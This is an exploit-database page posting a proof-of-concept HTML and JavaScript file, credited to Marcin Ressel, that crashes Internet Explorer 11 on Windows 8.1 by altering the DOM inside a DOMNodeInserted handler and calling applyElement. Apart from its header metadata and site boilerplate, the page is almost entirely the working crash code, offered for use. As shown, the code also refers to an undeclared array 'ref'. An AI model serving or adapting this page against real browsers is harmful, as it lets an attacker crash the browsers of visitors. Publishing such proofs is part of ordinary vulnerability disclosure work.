Internet Explorer 11 Remote Crash POC

2015.07.30
Credit: Marcin Ressel
Risk: Medium
Local: No
Remote: Yes
CVE: N/A
CWE: N/A

<!DOCTYPE html> <html> <head> <!--<meta http-equiv="refresh" content="1"/>--> <meta http-equiv="content-type" content="text/html; charset=UTF-8"> <meta http-equiv="Expires" content="0" /> <meta http-equiv="Cache-Control" content="no-store, no-cache, must-revalidate" /> <meta http-equiv="Cache-Control" content="post-check=0, pre-check=0" /> <meta http-equiv="Pragma" content="no-cache" /> <script type="text/javascript" language="JavaScript"> var hold_me = null; </script> <script type='text/javascript'></script> <title></title> </head> <body> <div id="out">..</div> <div id="oneUnArg">...</div> <div id="pHolder"></div> <script type="text/javascript" language="JavaScript"> /***************************************************** * Exploit Title: Internet Explorer 11 Remote Crash POC * Exploit Author: Marcin Ressel * Twitter: https://twitter.com/m_ressel/ * Vendor Homepage: http://www.microsoft.com * Software Link: n/a * Version: 11.0.9600.17905 * Tested on: Windows 8.1 x64 * CVE: n/a *****************************************************/ var src; var trg; var arg; var targetDomTree = document.getElementsByTagName("*"); for(var i=0;i<targetDomTree.length;i++) { ref.push(targetDomTree[i]); } src = ref[3]; trg = ref[8]; arg = ref[0]; trg.addEventListener("DOMNodeInserted", new Function('', 'src.parentNode.outerHTML = null;'+ 'src.style="overflow:scroll;"' ), false); trg.applyElement(document.createElement("meta"),"inside"); </script> </body> </html>


See this note in RAW Version
Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}
Copyright 2024, cxsecurity.com

 

Back to Top